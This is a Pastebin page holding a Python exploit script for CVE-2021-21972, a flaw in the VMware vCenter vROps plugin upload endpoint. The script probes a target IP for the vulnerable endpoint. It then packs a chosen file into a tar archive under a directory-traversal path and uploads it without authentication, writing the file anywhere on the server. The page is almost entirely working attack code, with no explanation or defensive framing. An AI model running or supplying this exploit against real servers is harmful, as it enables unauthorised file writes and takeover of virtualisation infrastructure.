Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- import argparse
- import requests
- import tarfile
- import urllib3
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
- def check(ip):
- r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
- if r.status_code == 405:
- print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
- return True
- else:
- print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
- return False
- def make_traversal_path(path, level=5, os="unix"):
- if os == "win":
- traversal = ".." + "\\"
- fullpath = traversal*level + path
- return fullpath.replace('/', '\\').replace('\\\\', '\\')
- else:
- traversal = ".." + "/"
- fullpath = traversal*level + path
- return fullpath.replace('\\', '/').replace('//', '/')
- def archive(file, path, os):
- tarf = tarfile.open('exploit.tar', 'w')
- fullpath = make_traversal_path(path, level=5, os=os)
- print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
- tarf.add(file, fullpath)
- tarf.close()
- print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
- def post(ip):
- r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
- if r.status_code == 200 and r.text == 'SUCCESS':
- print('[+] File uploaded successfully')
- else:
- print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
- print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
- if __name__ == "__main__":
- parser = argparse.ArgumentParser()
- parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
- parser.add_argument('-f', '--file', help='The file to tar')
- parser.add_argument('-p', '--path', help='The path to extract the file to on target')
- parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
- args = parser.parse_args()
- vulnerable = check(args.target)
- if vulnerable and (args.file and args.path and args.operating_system):
- archive(args.file, args.path, args.operating_system)
- post(args.target)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement